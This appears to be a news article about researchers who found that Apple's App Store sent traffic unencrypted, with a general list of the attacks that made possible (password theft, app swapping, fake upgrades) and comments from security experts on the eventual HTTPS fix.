Apple announced it had fixed the problem in January, but the researchers who discovered the flaw didn’t write about it until this month.
“I am really happy that my spare-time work pushed Apple to finally enable HTTPS to protect users,” Elie Bursztein, whose full-time job is with Google, wrote in a personal blog.
Apple did not respond to a request for comment.
Bursztein, along with Bernhard “Bruhns” Brehm of Recurity Labs and Rahul Iyer of Bejoi found out in July 2012 that communications between Apple’s App Store and consumers using the store were unencrypted. That deficiency opened up users to several kinds of attack on public networks, like those found in an airport or coffee shop, according to Bursztein.
The potential attacks included:
Password Stealing. When a user logged into the App Store, an attacker could slip a phony password request screen into the process, effectively prompting the user to hand over their password. “That Apple ID controls your credit card for buying music and apps; it controls all your backups with all your contacts,” Chet Wisniewski, a security advisor with cyber security software maker Sophos, said in an interview. “That’s pretty sensitive stuff,. The Apple ID is similar to Facebook and Google. Once it’s hacked, it cracks open the walnut of your entire digital life.”
App Swapping. A user could be duped into installing an attacker’s app when they think they’re installing legitimate software. An app that costs money can be substituted for a free app, too.
Fake Upgrades. Cyber thieves could trick a user into installing something other than the app upgrade they think they’re getting.
Installation Prevention. This would prevent an app from being installed on a machine by removing it from the store or by tricking the device into thinking the app has already been installed.
App spying. The App Store’s update mechanism could be tapped and all the applications installed on a user’s device could be viewed by a cyber peeper.
With App Store communications vulnerable for so long, it’s a wonder that a significant attack didn’t take place, said HD Moore, CSO of Rapid7 in Boston.
“I’ve seen the hacker community talking about this and demonstrate different techniques,” he said, “but it is surprising that there hasn’t been any more wide scale attacks.”
A limiting factor, he explained, is that you have to be in the same physical area as your target – either the same local segment or the same wireless network to carry it out.
The security breakdown could encourage mobile app makers to take another look at their wares, Moore added. “On mobile devices, a lot of folks can’t tell if SSL is on in the background. With desktops and laptops, users have been well-trained to look for that SSL lock icon in the corner.”
The incident could also grab the attention of security shops at online retailers, said Jamz Yaneza, threat research manager at Trend Micro in Cupertino, Calif.
“I think it’s a wake-up call for online retailers who outsource development of apps,” he said. “When they do that, they should make sure those apps use all the encryption that’s required.
“With all the breaches we’re been hearing about in the past few weeks, now is the time for them to take a close look on how they’re securing customer data.”